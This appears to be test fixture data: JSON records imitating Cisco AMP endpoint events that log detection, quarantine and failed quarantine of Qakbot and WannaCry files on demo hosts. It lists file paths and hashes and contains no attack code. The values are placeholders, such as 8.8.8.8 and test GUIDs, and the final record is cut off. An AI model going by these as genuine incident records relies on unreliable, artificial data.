+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 